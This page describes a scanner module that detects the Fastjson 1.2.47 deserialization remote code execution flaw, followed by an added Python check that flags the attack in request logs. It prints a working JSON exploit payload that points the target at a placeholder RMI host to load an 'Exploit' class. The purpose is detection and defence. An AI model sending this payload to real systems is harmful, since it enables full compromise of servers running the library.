
Fastjson 1.2.47 - Remote Code Execution

By kannthu

Critical
Vidoc Module
#rce #deserialization #oast #vulhub #fastjson
Description


What is "Fastjson 1.2.47 - Remote Code Execution"?

The "Fastjson 1.2.47 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.47, a Java library for JSON processing. This vulnerability allows for remote code execution through deserialization. The severity of this vulnerability is classified as critical, with a CVSS score of 10.

This module was authored by zh.

Impact

If successfully exploited, this vulnerability can allow an attacker to execute arbitrary code on the target system. This can lead to a complete compromise of the system, enabling unauthorized access, data theft, or further attacks.

How does the module work?

The module sends an HTTP POST request to the target system with a specific payload that triggers the deserialization vulnerability. The payload includes a malicious object that exploits the vulnerability in Fastjson 1.2.47.

Here is an example of the payload:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://<InteractionURL>/Exploit",
        "autoCommit":true
    }
}

The module includes matching conditions to determine if the vulnerability is present. It checks for specific responses from the target system, such as a "Bad Request" or a status code of 400. Additionally, it verifies that the interaction protocol used is not DNS-based.

For more information, refer to the GitHub repository.
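
Added example, not part of the Vidoc module or the original page: a defender-side check that parses logged JSON request bodies and flags the `@type` structure seen in the payload above. The sample bodies, the `collector.example.invalid` host, the function names, and the inclusion of `ldap://` and `ldaps://` alongside the page's `rmi://` are assumptions made for illustration.

```python
import json

# Constructed sample bodies (placeholders, not captured traffic).
SUSPECT_BODY = '''{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "autoCommit": true,
        "dataSourceName": "rmi://collector.example.invalid/Exploit"}
}'''
BENIGN_BODY = '{"user": {"name": "alice", "type": "admin"}, "items": [1, 2]}'

# rmi:// appears in the page's payload; the ldap schemes are an added assumption.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://")


def walk(node, path="$"):
    """Yield (path, dict) for every JSON object nested in the document."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def inspect_body(body):
    """Return findings for one request body; an empty list means nothing flagged."""
    try:
        doc = json.loads(body)  # also decodes escaped keys such as \u0040type
    except ValueError:
        # Strict parsing failed: fall back to a plain substring check.
        return ["unparseable body mentions @type"] if "@type" in body else []
    findings = []
    for path, obj in walk(doc):
        type_name = obj.get("@type")
        if not isinstance(type_name, str):
            continue
        findings.append(f"{path}: @type={type_name}")
        if type_name == "java.lang.Class" and isinstance(obj.get("val"), str):
            findings.append(f"{path}: java.lang.Class names {obj['val']}")
        for key, value in obj.items():
            if isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES):
                findings.append(f"{path}.{key}: JNDI-style URL in typed object")
    return findings


if __name__ == "__main__":
    for name, body in (("suspect", SUSPECT_BODY), ("benign", BENIGN_BODY)):
        print(name, inspect_body(body))
```

Any `@type` key in a request body is worth a finding on an endpoint that does not expect typed JSON; the `java.lang.Class` and URL checks narrow it to the shape of the payload shown on this page.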

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns
and
word: Bad Request, 400
Passive global matcher
No matching conditions.
On match action
Report vulnerability